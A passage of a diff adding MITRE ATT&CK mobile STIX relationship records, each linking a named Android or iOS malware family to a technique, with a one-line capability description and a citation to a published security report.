"id": "relationship--75989cf6-c023-4ed3-9d23-a83f55690186", + "created": "2023-02-28T21:43:36.886Z", + "revoked": false, + "external_references": [ + { + "source_name": "cloudmark_tanglebot_0921", + "description": "Felipe Naves, Andrew Conway, W. Stuart Jones, Adam McNeil . (2021, September 23). TangleBot: New Advanced SMS Malware Targets Mobile Users Across U.S. and Canada with COVID-19 Lures. Retrieved February 28, 2023.", + "url": "https://www.cloudmark.com/en/blog/malware/tanglebot-new-advanced-sms-malware-targets-mobile-users-across-us-and-canada-covid-19" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2023-02-28T21:43:36.886Z", + "description": "[TangleBot](https://attack.mitre.org/software/S1069) can read incoming text messages.(Citation: cloudmark_tanglebot_0921)", + "relationship_type": "uses", + "source_ref": "malware--68156e5a-4c3a-46dd-9c5e-c0bfdec6651f", + "target_ref": "attack-pattern--c6421411-ae61-42bb-9098-73fddb315002", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.1.0", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "relationship--22708018-defd-4690-8b0f-fe47e11cb5d6", + "type": "relationship", + "created": "2020-07-15T20:20:59.316Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "source_name": "Bitdefender Mandrake", + "url": "https://www.bitdefender.com/files/News/CaseStudies/study/329/Bitdefender-PR-Whitepaper-Mandrake-creat4464-en-EN-interactive.pdf", + "description": "R. Gevers, M. Tivadar, R. Bleotu, A. M. Barbatei, et al.. (2020, May 14). Uprooting Mandrake: The Story of an Advanced Android Spyware Framework That Went Undetected for 4 Years. Retrieved July 15, 2020." + } + ], + "modified": "2020-07-15T20:20:59.316Z", + "description": "[Mandrake](https://attack.mitre.org/software/S0485) can capture all device notifications and hide notifications from the user.(Citation: Bitdefender Mandrake)", + "relationship_type": "uses", + "source_ref": "malware--52c994fa-b6c8-45a8-9586-a4275cf19307", + "target_ref": "attack-pattern--39dd7871-f59b-495f-a9a5-3cb8cc50c9b2", + "x_mitre_version": "1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "relationship--684c17bb-2075-4e1f-9fcb-17408511222d", + "type": "relationship", + "created": "2021-09-20T13:54:19.957Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "source_name": "Lookout Uyghur Campaign", + "url": "https://www.lookout.com/documents/threat-reports/us/lookout-uyghur-malware-tr-us.pdf", + "description": "A. Kumar, K. Del Rosso, J. Albrecht, C. Hebeisen. (2020, June 1). Mobile APT Surveillance Campaigns Targeting Uyghurs - A collection of long-running Android tooling connected to a Chinese mAPT actor. Retrieved November 10, 2020." + } + ], + "modified": "2021-09-20T13:54:19.957Z", + "description": "[CarbonSteal](https://attack.mitre.org/software/S0529) can silently accept an incoming phone call.(Citation: Lookout Uyghur Campaign)", + "relationship_type": "uses", + "source_ref": "malware--007ebf84-4e14-44c7-a5aa-151d5de85320", + "target_ref": "attack-pattern--351ddf79-2d3a-41b4-9bef-82ea5d3ccd69", + "x_mitre_version": "1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "type": "relationship", + "id": "relationship--5a64b957-32fb-4dd6-84ae-48a2c74c560f", + "created": "2023-03-20T15:56:34.418Z", + "revoked": false, + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2023-03-20T15:56:34.418Z", + "description": "", + "relationship_type": "detects", + "source_ref": "x-mitre-data-component--b1e0bb80-23d4-44f2-b919-7e9c54898f43", + "target_ref": "attack-pattern--9c049d7b-c92a-4733-9381-27e2bd2ccadc", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.1.0", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "type": "relationship", + "id": "relationship--794c3cb4-1a1f-4d7e-969f-c97dfcd006c7", + "created": "2020-11-24T17:55:12.889Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "Talos GPlayed", + "description": "V. Ventura. (2018, October 11). GPlayed Trojan - .Net playing with Google Market . Retrieved November 24, 2020.", + "url": "https://blog.talosintelligence.com/2018/10/gplayedtrojan.html" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2023-04-05T17:22:27.554Z", + "description": "[GPlayed](https://attack.mitre.org/software/S0536) can request device administrator permissions.(Citation: Talos GPlayed)", + "relationship_type": "uses", + "source_ref": "malware--a993495c-9813-4372-b9ec-d168c7f7ec0a", + "target_ref": "attack-pattern--9c049d7b-c92a-4733-9381-27e2bd2ccadc", + "x_mitre_deprecated": false, + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "3.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "type": "relationship", + "id": "relationship--ee92911e-e2a2-4b40-916d-ce01b6e897f9", + "created": "2020-09-15T15:18:12.419Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "Cybereason FakeSpy", + "description": "O. Almkias. (2020, July 1). FakeSpy Masquerades as Postal Service Apps Around the World. Retrieved September 15, 2020.", + "url": "https://www.cybereason.com/blog/fakespy-masquerades-as-postal-service-apps-around-the-world" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2023-04-05T19:56:18.859Z", + "description": "[FakeSpy](https://attack.mitre.org/software/S0509) can collect the device’s contact list.(Citation: Cybereason FakeSpy)", + "relationship_type": "uses", + "source_ref": "malware--838f647e-8ff8-48bd-bbd5-613cee7736cb", + "target_ref": "attack-pattern--e0b9ecb8-a7d1-43c7-aa30-8e19c6a92c86", + "x_mitre_deprecated": false, + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "3.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "type": "relationship", + "id": "relationship--a451966b-f826-422b-9505-f564b9988a9c", + "created": "2020-12-24T21:55:56.693Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "Lookout Uyghur Campaign", + "description": "A. Kumar, K. Del Rosso, J. Albrecht, C. Hebeisen. (2020, June 1). Mobile APT Surveillance Campaigns Targeting Uyghurs - A collection of long-running Android tooling connected to a Chinese mAPT actor. Retrieved November 10, 2020.", + "url": "https://www.lookout.com/documents/threat-reports/us/lookout-uyghur-malware-tr-us.pdf" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2023-04-05T21:27:39.012Z", + "description": "[DoubleAgent](https://attack.mitre.org/software/S0550) has used both FTP and TCP sockets for data exfiltration.(Citation: Lookout Uyghur Campaign)", + "relationship_type": "uses", + "source_ref": "malware--3d6c4389-3489-40a3-beda-c56e650b6f68", + "target_ref": "attack-pattern--6a3f6490-9c44-40de-b059-e5940f246673", + "x_mitre_deprecated": false, + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "3.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "type": "relationship", + "id": "relationship--e457921c-4a0b-4d6e-92e7-553929ddf943", + "created": "2023-02-06T18:51:14.919Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "lookout_abstractemu_1021", + "description": "P Shunk, K Balaam. (2021, October 28). Rooting Malware Makes a Comeback: Lookout Discovers Global Campaign. Retrieved February 6, 2023.", + "url": "https://www.lookout.com/blog/lookout-discovers-global-rooting-malware-campaign" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2023-03-27T17:23:48.120Z", + "description": "[AbstractEmu](https://attack.mitre.org/software/S1061) can download and install additional malware after initial infection.(Citation: lookout_abstractemu_1021)", + "relationship_type": "uses", + "source_ref": "malware--2aec175b-4429-4048-8e09-3ef6cbecfc64", + "target_ref": "attack-pattern--6c49d50f-494d-4150-b774-a655022d20a6", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "type": "relationship", + "id": "relationship--fc7639c8-0e52-4f6f-9cf3-7840be81ad55", + "created": "2023-03-03T16:23:56.031Z", + "revoked": false, + "external_references": [ + { + "source_name": "paloalto_yispecter_1015", + "description": "Claud Xiao. (2015, October 4). YiSpecter: First iOS Malware That Attacks Non-jailbroken Apple iOS Devices by Abusing Private APIs. Retrieved March 3, 2023.", + "url": "https://unit42.paloaltonetworks.com/yispecter-first-ios-malware-attacks-non-jailbroken-ios-devices-by-abusing-private-apis/" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2023-03-03T16:23:56.031Z", + "description": "[YiSpecter](https://attack.mitre.org/software/S0311) has collected the device UUID.(Citation: paloalto_yispecter_1015)", + "relationship_type": "uses", + "source_ref": "malware--a15c9357-2be0-4836-beec-594f28b9b4a9", + "target_ref": "attack-pattern--e2ea7f6b-8d4f-49c3-819d-660530d12b77", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.1.0", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "type": "relationship", + "id": "relationship--d2749285-47d9-44a4-962f-9215e6fb580e", + "created": "2020-10-29T17:48:27.380Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "Threat Fabric Exobot", + "description": "Threat Fabric. (2017, February). Exobot - Android banking Trojan on the rise. Retrieved October 29, 2020.", + "url": "https://www.threatfabric.com/blogs/exobot_android_banking_trojan_on_the_rise.html" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2023-04-05T19:54:30.569Z", + "description": "[Exobot](https://attack.mitre.org/software/S0522) can access the device’s contact list.(Citation: Threat Fabric Exobot)", + "relationship_type": "uses", + "source_ref": "malware--c91cec55-634c-4670-ba10-2dc7ceb28e98", + "target_ref": "attack-pattern--e0b9ecb8-a7d1-43c7-aa30-8e19c6a92c86", + "x_mitre_deprecated": false, + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "3.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "relationship--97738857-d496-4d39-9809-1921e0ad10b7", + "type": "relationship", + "created": "2020-12-31T18:25:05.125Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "source_name": "CYBERWARCON CHEMISTGAMES", + "url": "https://www.youtube.com/watch?v=xoNSbm1aX_w", + "description": "B. Leonard, N. Mehta. (2019, November 21). The Secret Life of Sandworms. Retrieved December 31, 2020." + } + ], + "modified": "2020-12-31T18:25:05.125Z", + "description": "[CHEMISTGAMES](https://attack.mitre.org/software/S0555) can collect files from the filesystem and account information from Google Chrome.(Citation: CYBERWARCON CHEMISTGAMES)", + "relationship_type": "uses", + "source_ref": "malware--a0d774e4-bafc-4292-8651-3ec899391341", + "target_ref": "attack-pattern--e1c912a9-e305-434b-9172-8a6ce3ec9c4a", + "x_mitre_version": "1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "type": "relationship", + "id": "relationship--13aba849-5004-4457-9f3b-49e470b589e0", + "created": "2023-03-20T18:43:44.617Z", + "revoked": false, + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2023-03-20T18:43:44.617Z", + "description": "", + "relationship_type": "detects", + "source_ref": "x-mitre-data-component--764ee29e-48d6-4934-8e6b-7a606aaaafc0", + "target_ref": "attack-pattern--2bb20118-e6c0-41dc-a07c-283ea4dd0fb8", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.1.0", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "type": "relationship", + "id": "relationship--51457698-e98b-435a-88c2-75a82cdc2bda", + "created": "2018-10-17T00:14:20.652Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "Lookout-StealthMango", + "description": "Lookout. (n.d.). Stealth Mango & Tangelo. Retrieved September 27, 2018.", + "url": "https://info.lookout.com/rs/051-ESQ-475/images/lookout-stealth-mango-srr-us.pdf" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2023-04-05T17:38:56.380Z", + "description": "[Stealth Mango](https://attack.mitre.org/software/S0328) uploads call logs.(Citation: Lookout-StealthMango)", + "relationship_type": "uses", + "source_ref": "malware--085eb36d-697d-4d9a-bac3-96eb879fe73c", + "target_ref": "attack-pattern--1d1b1558-c833-482e-aabb-d07ef6eae63d", + "x_mitre_deprecated": false, + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "3.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "type": "relationship", + "id": "relationship--209aa948-393c-46b0-9488-ef93a6252438", + "created": "2022-03-30T20:07:19.296Z", + "x_mitre_version": "0.1", + "x_mitre_deprecated": false, + "revoked": false, + "description": "", + "modified": "2022-03-30T20:07:19.296Z", + "relationship_type": "subtechnique-of", + "source_ref": "attack-pattern--f05fc151-aa62-47e3-ae57-2d1b23d64bf6", + "target_ref": "attack-pattern--fc53309d-ebd5-4573-9242-57024ebdad4f", + "x_mitre_attack_spec_version": "2.1.0", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "type": "relationship", + "id": "relationship--93b6bf37-5614-4317-8ed7-42f098152c40", + "created": "2023-02-28T20:39:18.320Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "proofpoint_flubot_0421", + "description": "Crista Giering, F. Naves, Andrew Conway, Adam McNeil . (2021, April 27). FluBot Android Malware Spreading Rapidly Through Europe, May Hit U.S. Soon. Retrieved February 28, 2023.", + "url": "https://www.proofpoint.com/us/blog/threat-insight/flubot-android-malware-spreading-rapidly-through-europe-may-hit-us-soon" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2023-03-31T22:10:38.672Z", + "description": "[FluBot](https://attack.mitre.org/software/S1067) can use a SOCKS proxy to evade C2 IP detection.(Citation: proofpoint_flubot_0421)", + "relationship_type": "uses", + "source_ref": "malware--f5ff006c-702f-4ded-8e60-ca6c540d91bc", + "target_ref": "attack-pattern--5ca3c7ec-55b2-4587-9376-cf6c96f8047a", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "relationship--d6f78e9b-94d1-4d59-b00e-89fad2261c55", + "type": "relationship", + "created": "2020-04-24T17:46:31.603Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "source_name": "SecurityIntelligence TrickMo", + "url": "https://securityintelligence.com/posts/trickbot-pushing-a-2fa-bypass-app-to-bank-customers-in-germany/", + "description": "P. Asinovsky. (2020, March 24). TrickBot Pushing a 2FA Bypass App to Bank Customers in Germany. Retrieved April 24, 2020." + } + ], + "modified": "2020-04-24T17:46:31.603Z", + "description": "[TrickMo](https://attack.mitre.org/software/S0427) can steal pictures from the device.(Citation: SecurityIntelligence TrickMo)", + "relationship_type": "uses", + "source_ref": "malware--21170624-89db-4e99-bf27-58d26be07c3a", + "target_ref": "attack-pattern--e1c912a9-e305-434b-9172-8a6ce3ec9c4a", + "x_mitre_version": "1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "type": "relationship", + "id": "relationship--c83c84e8-a556-4efe-ae24-75970ee8ad4b", + "created": "2017-12-14T16:46:06.044Z", + "x_mitre_version": "1.0", + "external_references": [ + { + "source_name": "Kaspersky-WUC", + "url": "https://securelist.com/android-trojan-found-in-targeted-attack-58/35552/", + "description": "Costin Raiu, Denis Maslennikov, Kurt Baumgartner. (2013, March 26). Android Trojan Found in Targeted Attack. Retrieved December 23, 2016." + } + ], + "x_mitre_deprecated": false, + "revoked": false, + "description": "[Android/Chuli.A](https://attack.mitre.org/software/S0304) used SMS to receive command and control messages.(Citation: Kaspersky-WUC)", + "modified": "2022-04-19T14:25:41.669Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "relationship_type": "uses", + "source_ref": "malware--d05f7357-4cbe-47ea-bf83-b8604226d533", + "target_ref": "attack-pattern--ec4c4baa-026f-43e8-8f56-58c36f3162dd", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "type": "relationship", + "id": "relationship--4ae0c45f-4ff0-4296-aaf4-c3e0d2e355e3", + "created": "2020-09-15T15:18:12.462Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "Cybereason FakeSpy", + "description": "O. Almkias. (2020, July 1). FakeSpy Masquerades as Postal Service Apps Around the World. Retrieved September 15, 2020.", + "url": "https://www.cybereason.com/blog/fakespy-masquerades-as-postal-service-apps-around-the-world" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2023-04-05T20:42:40.327Z", + "description": "[FakeSpy](https://attack.mitre.org/software/S0509) can hide its icon if it detects that it is being run on an emulator.(Citation: Cybereason FakeSpy)", + "relationship_type": "uses", + "source_ref": "malware--838f647e-8ff8-48bd-bbd5-613cee7736cb", + "target_ref": "attack-pattern--f05fc151-aa62-47e3-ae57-2d1b23d64bf6", + "x_mitre_deprecated": false, + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "3.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "relationship--760faa7b-06cb-48b7-9103-1c52f2ca408f", + "type": "relationship", + "created": "2020-11-10T17:08:35.644Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "source_name": "Lookout Uyghur Campaign", + "url": "https://www.lookout.com/documents/threat-reports/us/lookout-uyghur-malware-tr-us.pdf", + "description": "A. Kumar, K. Del Rosso, J. Albrecht, C. Hebeisen. (2020, June 1). Mobile APT Surveillance Campaigns Targeting Uyghurs - A collection of long-running Android tooling connected to a Chinese mAPT actor. Retrieved November 10, 2020." + } + ], + "modified": "2020-11-10T17:08:35.644Z", + "description": "[CarbonSteal](https://attack.mitre.org/software/S0529) has gathered device metadata, including model, manufacturer, SD card size, disk usage, memory, CPU, and serial number.(Citation: Lookout Uyghur Campaign)", + "relationship_type": "uses", + "source_ref": "malware--007ebf84-4e14-44c7-a5aa-151d5de85320", + "target_ref": "attack-pattern--e2ea7f6b-8d4f-49c3-819d-660530d12b77", + "x_mitre_version": "1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "relationship--d53a8ff0-7252-477e-8767-fd485dd62e7c", + "type": "relationship", + "created": "2020-12-18T20:14:47.381Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "source_name": "WhiteOps TERRACOTTA", + "url": "https://www.whiteops.com/blog/terracotta-android-malware-a-technical-study", + "description": "Satori Threat Intelligence and Research Team. (2020, August). TERRACOTTA Android Malware: A Technical Study. Retrieved December 18, 2020." + } + ], + "modified": "2020-12-28T18:59:33.140Z", + "description": "[TERRACOTTA](https://attack.mitre.org/software/S0545) has collected the device’s phone number and can check if the active network connection is metered.(Citation: WhiteOps TERRACOTTA)", + "relationship_type": "uses", + "source_ref": "malware--e296b110-46d3-4f7a-894c-cc71ea50168c", + "target_ref": "attack-pattern--d4536441-1bcc-49fa-80ae-a596ed3f7ffd", + "x_mitre_version": "1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "type": "relationship", + "id": "relationship--93b2474b-0ba6-469e-a4e8-d17a41d0d016", + "created": "2022-04-15T18:12:53.512Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "Xiao-KeyRaider", + "description": "Claud Xiao. (2015, August 30). KeyRaider: iOS Malware Steals Over 225,000 Apple Accounts to Create Free App Utopia. Retrieved December 12, 2016.", + "url": "http://researchcenter.paloaltonetworks.com/2015/08/keyraider-ios-malware-steals-over-225000-apple-accounts-to-create-free-app-utopia/" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2023-04-05T21:28:29.839Z", + "description": "[Monokle](https://attack.mitre.org/software/S0407) can install attacker-specified certificates to the device's trusted certificate store, enabling an adversary to perform adversary-in-the-middle attacks.(Citation: Xiao-KeyRaider)", + "relationship_type": "uses", + "source_ref": "malware--6a7aaab1-3e0a-48bb-ba66-bbf7665c0a65", + "target_ref": "attack-pattern--08e22979-d320-48ed-8711-e7bf94aabb13", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "relationship--f0851531-e554-4658-920c-f2342632c19a", + "type": "relationship", + "created": "2017-12-14T16:46:06.044Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "source_name": "Lookout-Adware", + "description": "Michael Bentley. (2015, November 4). Lookout discovers new trojanized adware; 20K popular apps caught in the crossfire. Retrieved December 21, 2016.", + "url": "https://blog.lookout.com/blog/2015/11/04/trojanized-adware/" + } + ], + "modified": "2018-10-17T00:14:20.652Z", + "description": "[ShiftyBug](https://attack.mitre.org/software/S0294) is packed with at least eight publicly available exploits that can perform rooting.(Citation: Lookout-Adware)", + "relationship_type": "uses", + "source_ref": "malware--c80a6bef-b3ce-44d0-b113-946e93124898", + "target_ref": "attack-pattern--351c0927-2fc1-4a2c-ad84-cbbee7eb8172", + "x_mitre_version": "1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "type": "relationship", + "id": "relationship--0e9edc13-7af7-43c4-8ec2-636b1f8cb7f1", + "created": "2017-12-14T16:46:06.044Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "Lookout-BrainTest", + "description": "Chris Dehghanpoor. (2016, January 6). Brain Test re-emerges: 13 apps found in Google Play Read more: Brain Test re-emerges: 13 apps found in Google Play. Retrieved December 21, 2016.", + "url": "https://blog.lookout.com/blog/2016/01/06/brain-test-re-emerges/" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2023-04-05T21:25:52.381Z", + "description": "[BrainTest](https://attack.mitre.org/software/S0293) uses root privileges (if available) to copy an additional Android app package (APK) to /system/priv-app to maintain persistence even after a factory reset.(Citation: Lookout-BrainTest)", + "relationship_type": "uses", + "source_ref": "malware--e13d084c-382f-40fd-aa9a-98d69e20301e", + "target_ref": "attack-pattern--4f14e30b-8b57-4a7b-9093-2c0778ea99cf", + "x_mitre_deprecated": false, + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "3.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "relationship--1c180c0e-c789-4176-b568-789ada9487bb", + "type": "relationship", + "created": "2020-10-29T19:21:23.162Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "source_name": "WeLiveSecurity AdDisplayAshas", + "url": "https://www.welivesecurity.com/2019/10/24/tracking-down-developer-android-adware/", + "description": "L. Stefanko. (2019, October 24). Tracking down the developer of Android adware affecting millions of users. Retrieved October 29, 2020." + } + ], + "modified": "2020-10-29T19:21:23.162Z", + "description": "[Android/AdDisplay.Ashas](https://attack.mitre.org/software/S0525) can collect information about the device including device type, OS version, language, free storage space, battery status, device root, and if *developer mode* is enabled.(Citation: WeLiveSecurity AdDisplayAshas)", + "relationship_type": "uses", + "source_ref": "malware--f7e7b736-2cff-4c2a-9232-352cd383463a", + "target_ref": "attack-pattern--e2ea7f6b-8d4f-49c3-819d-660530d12b77", + "x_mitre_version": "1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "type": "relationship", + "id": "relationship--de4ecfa3-fa91-4377-810c-5c567de9688b", + "created": "2021-01-05T20:16:20.490Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "Zscaler TikTok Spyware", + "description": "S. Desai. (2020, September 8). TikTok Spyware. Retrieved January 5, 2021.", + "url": "https://www.zscaler.com/blogs/security-research/tiktok-spyware" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2023-04-05T20:38:01.842Z", + "description": "[Tiktok Pro](https://attack.mitre.org/software/S0558) can delete attacker-specified files.(Citation: Zscaler TikTok Spyware)", + "relationship_type": "uses", + "source_ref": "malware--c6abcaf8-1765-41f8-9fe5-03d42fd0f6c0", + "target_ref": "attack-pattern--ab7400b7-3476-4776-9545-ef3fa373de63", + "x_mitre_deprecated": false, + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "3.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "relationship--ba8735ad-b9c6-4b35-9fac-d4747ab0b2ae", + "type": "relationship", + "created": "2020-11-10T17:08:35.746Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "source_name": "Lookout Uyghur Campaign", + "url": "https://www.lookout.com/documents/threat-reports/us/lookout-uyghur-malware-tr-us.pdf", + "description": "A. Kumar, K. Del Rosso, J. Albrecht, C. Hebeisen. (2020, June 1). Mobile APT Surveillance Campaigns Targeting Uyghurs - A collection of long-running Android tooling connected to a Chinese mAPT actor. Retrieved November 10, 2020." + } + ], + "modified": "2020-12-01T19:48:44.878Z", + "description": "[CarbonSteal](https://attack.mitre.org/software/S0529) has searched device storage for various files, including .amr files (audio recordings) and superuser binaries.(Citation: Lookout Uyghur Campaign)", + "relationship_type": "uses", + "source_ref": "malware--007ebf84-4e14-44c7-a5aa-151d5de85320", + "target_ref": "attack-pattern--cf28ca46-1fd3-46b4-b1f6-ec0b72361848", + "x_mitre_version": "1.0", + "x_mitre_modified_by_ref": 